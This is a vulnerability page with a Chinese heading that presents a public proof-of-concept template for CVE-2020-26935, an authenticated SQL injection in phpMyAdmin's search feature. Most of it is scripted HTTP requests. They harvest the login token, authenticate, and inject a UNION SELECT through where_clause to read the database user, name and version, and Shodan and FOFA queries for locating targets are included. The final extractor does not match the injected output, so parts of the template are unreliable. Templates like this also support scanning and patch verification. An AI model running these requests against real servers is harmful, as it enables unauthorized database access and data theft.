漏洞描述
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
CVE-2020-26935: phpMyAdmin < 5.0.3 - SQL Injection
PoC代码[已公开]
id: CVE-2020-26935
info:
name: phpMyAdmin < 5.0.3 - SQL Injection
author: 0x_Akoko
severity: critical
description: |
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.
reference:
- https://www.phpmyadmin.net/security/PMASA-2020-6/
- https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2
- https://nvd.nist.gov/vuln/detail/CVE-2020-26935
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-26935
epss-score: 0.87812
epss-percentile: 0.9945
cwe-id: CWE-89
metadata:
verified: true
max-request: 4
shodan-query: http.title:"phpMyAdmin"
fofa-query: app="phpMyAdmin"
tags: cve,cve2020,phpmyadmin,sqli,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "phpMyAdmin", "name=\"token\"")
condition: and
internal: true
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- 'name="token" value="([^"]+)"'
internal: true
- type: regex
name: set_session
part: body
group: 1
regex:
- 'name="set_session" value="([^"]+)"'
internal: true
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
pma_username={{username}}&pma_password={{password}}&server=1&target=index.php&token={{token}}&set_session={{set_session}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "pmaAuth-1=")
condition: and
internal: true
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "logged_in:true")
condition: and
internal: true
extractors:
- type: regex
name: token2
part: body
group: 1
regex:
- 'token:"([^"]+)"'
internal: true
- raw:
- |
POST /tbl_zoom_select.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
db=testdb&table=users&where_clause=1=0 UNION SELECT 1,CONCAT(USER(),0x3a,DATABASE(),0x3a,VERSION()),3-- -&where_clause_sign=&token={{token2}}&ajax_request=true&get_data_row=true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "\"success\":true", "\"row_info\"")
condition: and
extractors:
- type: regex
name: sqli_data
part: body
group: 1
regex:
- '"username":"([^"]+)"'
# digest: 4a0a00473045022100d1e4d471f4dbdde08855076cc8fb81cfe25be3818c01572fe60add3288ce038f02206114ec31c566253a7f0435e884fb10f85d3ba90f23b28ab45df2dffb8a735886:922c64590222798bb761d5b6d8e72950